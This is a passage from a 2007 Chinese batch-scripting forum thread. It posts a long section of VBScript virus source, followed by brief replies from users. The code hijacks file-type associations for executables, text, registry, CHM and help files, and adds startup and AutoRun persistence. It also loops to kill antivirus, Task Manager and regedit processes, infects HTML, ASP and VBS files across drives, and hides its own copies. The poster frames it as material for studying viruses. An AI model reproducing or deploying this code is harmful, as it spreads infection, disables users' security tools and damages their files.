  605.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
  606.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
  607.     End If
  608.     Set dc = objfso.Drives
  609.     For Each d In dc
  610.         If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
  611.             objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
  612.             objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
  613.         End If
  614.     Next
  615.     If objfso.FileExists(FullPath_V1) = True Then
  616.         Set vf = objfso.GetFile(FullPath_V1)
  617.         vf.Delete
  618.     End If
  619.     If objfso.FileExists(FullPath_V0) = true Then
  620.         Set vf = objfso.GetFile(FullPath_V0)
  621.         vf.Delete
  622.     End If
  623.     If objfso.FileExists(FullPath_Config) = True Then
  624.         objfso.DeleteFile FullPath_Config , True
  625.     End If
  626. End Sub
  627. 'OJCQCFHDTCJ1_8
  628. 'FYCOKKOUFWQFE2_23
  629. Function MakeScript(strCode, T)
  630.     If T = 1 Then
  631.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
  632.     Else
  633.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
  634.     End If
  635. End Function
  636. 'OJCQCFHDTCJ2_23
  637. 'FYCOKKOUFWQFE2_10
  638. Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
  639.     On Error Resume Next
  640.     Dim d , dc
  641.     Set dc = objfso.Drives
  642.     For Each d In dc
  643.         If Cnt >= CntMax Then '
  644.             Exit For
  645.         End If
  646.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  647.             'If d.DriveType = 1 Then
  648.             Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
  649.             'End If
  650.         End If
  651.     Next
  652. End Sub
  653. 'OJCQCFHDTCJ2_10
  654. 'FYCOKKOUFWQFE1_5
  655. Sub MonitorSystem(objfso, vbsCode)
  656.     On Error Resume Next
  657.     Dim ProcessNames
  658.     ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
  659.     Do
  660.         Call KillProcess(ProcessNames)
  661.         Call InvadeSystem(objfso, vbsCode)
  662.         WScript.Sleep 5000
  663.     Loop
  664. End Sub
  665. 'OJCQCFHDTCJ1_5
  666. 'FYCOKKOUFWQFE1_7
  667. Sub InvadeSystem(objfso, vbsCode)
  668.     On Error Resume Next
  669.     Dim Value, HCULoad, vbsCode_Virus, dc, d
  670.     Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
  671.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  672.     vbsCode_Virus = vbsCode
  673.     Set dc = objfso.Drives
  674.     For Each d In dc
  675.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  676.             Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
  677.         End If
  678.     Next
  679.     If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
  680.         objfso.DeleteFile FullPath_V1 , True
  681.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
  682.         Call SetFileAttr(objfso, FullPath_V1)
  683.     Else
  684.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
  685.         Call SetFileAttr(objfso, FullPath_V1)
  686.     End If
  687.     If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
  688.         objfso.DeleteFile FullPath_V0 , True
  689.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
  690.         Call SetFileAttr(objfso, FullPath_V0)
  691.     Else
  692.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
  693.         Call SetFileAttr(objfso, FullPath_V0)
  694.     End If
  695.     If ReadReg(HCULoad)<> FullPath_V1 Then
  696.         Call WriteReg (HCULoad, FullPath_V1, "")
  697.     End If
  698.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  699.         Call SetTxtFileAss(FullPath_V0)
  700.     End If
  701.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  702.         Call SetRegFileAss(FullPath_V0)
  703.     End If
  704.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  705.         Call SetchmFileAss(FullPath_V0)
  706.     End If
  707.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  708.         Call SethlpFileAss(FullPath_V0)
  709.     End If
  710.     Call DeSafeSet()
  711. End Sub
  712. 'OJCQCFHDTCJ1_7
  713. 'FYCOKKOUFWQFE2_16
  714. Sub SetTxtFileAss(sFilePath)
  715.     On Error Resume Next
  716.     Dim Value
  717.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  718.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  719. End Sub
  720. Sub SethlpFileAss(sFilePath)
  721.     On Error Resume Next
  722.     Dim Value
  723.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  724.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  725. End Sub
  726. Sub SetRegFileAss(sFilePath)
  727.     On Error Resume Next
  728.     Dim Value
  729.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  730.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  731. End Sub
  732. Sub SetchmFileAss(sFilePath)
  733.     On Error Resume Next
  734.     Dim Value
  735.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  736.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  737. End Sub
  738. 'OJCQCFHDTCJ2_16
  739. 'FYCOKKOUFWQFE2_15
  740. Sub SetFileAttr(objfso, pathf)
  741.     Dim vf
  742.     Set vf = objfso.GetFile(pathf)
  743.     vf.Attributes = 6
  744. End Sub
  745. 'OJCQCFHDTCJ2_15
  746. 'FYCOKKOUFWQFE2_22
  747. Function GetSFolder(p)
  748.     Dim objfso
  749.     Set objfso = CreateObject(GetFSOName())
  750.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  751.     Set objfso = Nothing
  752. End Function
  753. Function GetUserName()
  754.     On Error Resume Next
  755.     Dim Value , UserName
  756.     Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
  757.     UserName = ReadReg(Value)
  758.     If UserName = "" Then
  759.         GetUserName = "Administrator"
  760.     Else
  761.         GetUserName = UserName
  762.     End If
  763. End Function
  764. Function GetFSOName()
  765.     On Error Resume Next
  766.     Dim Value , UserName
  767.     Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
  768.     UserName = ReadReg(Value)
  769.     If UserName = "" Then
  770.         GetUserName = "Scripting.FileSystemObject"
  771.     Else
  772.         GetFSOName = UserName
  773.     End If
  774. End Function
  775. Function GetHeadTail(l)
  776.     Dim Str , buffer
  777.     If l = 0 Then
  778.         GetHeadTail = "'" & GetUserName()
  779.     Else
  780.         buffer = GetUserName()
  781.         Str = ""
  782.         For i = 1 To Len(buffer)
  783.             Str = Mid(buffer, i, 1) & Str
  784.             GetHeadTail = "'" & Str
  785.         Next
  786.     End If
  787. End Function
  788. 'OJCQCFHDTCJ2_22
  789. 'FYCOKKOUFWQFE2_11
  790. Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
  791.     On Error Resume Next
  792.     Dim pfo, pf, pfi, ext
  793.     Dim psfo, ps
  794.     Set pfo = objfso.GetFolder(strPath)
  795.     Set pf = pfo.Files
  796.     For Each pfi In pf
  797.         If Cnt >= CntMax Then
  798.             Exit For
  799.         End If
  800.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  801.         Select Case ext
  802.             Case "hta", "htm", "html", "asp", "vbs"
  803.                 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
  804.             Case "mpg", "rmvb", "avi", "rm"
  805.                 If IsSexFile(pfi.Name) = True Then
  806.                     pfi.Delete
  807.                 End If
  808.         End Select
  809.     Next
  810.     Set psfo = pfo.SubFolders
  811.     For Each ps In psfo
  812.         If Cnt >= CntMax Then
  813.             Exit For
  814.         End If
  815.         Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
  816.     Next
  817. End Sub
  818. 'OJCQCFHDTCJ2_11
  819. 'rotartsinimdA
复制代码

作者: somebody    时间: 2007-11-7 17:01

牛啊,好长啊....看不懂
作者: smilediao    时间: 2007-11-7 22:54

楼主你在开玩笑吧!太长了!我还是比较喜欢看精简的!
作者: novaa    时间: 2007-11-8 14:10

我也不懂VBS
只是提供给那些喜欢研究病毒代码的人

作者: ranon    时间: 2007-12-22 13:44

喜欢就是不0................
作者: redsky14    时间: 2008-5-9 17:37

.....先是收藏了再说,,拿回去慢慢研究,,,
作者: ak42d    时间: 2008-5-12 14:34

怎么什么都没有啊!~~~~~

看不见啊
作者: IceSea    时间: 2008-7-30 17:07

谢谢楼主,学习学习




欢迎光临 批处理之家 (http://www.bathome.net/) Powered by Discuz! 7.2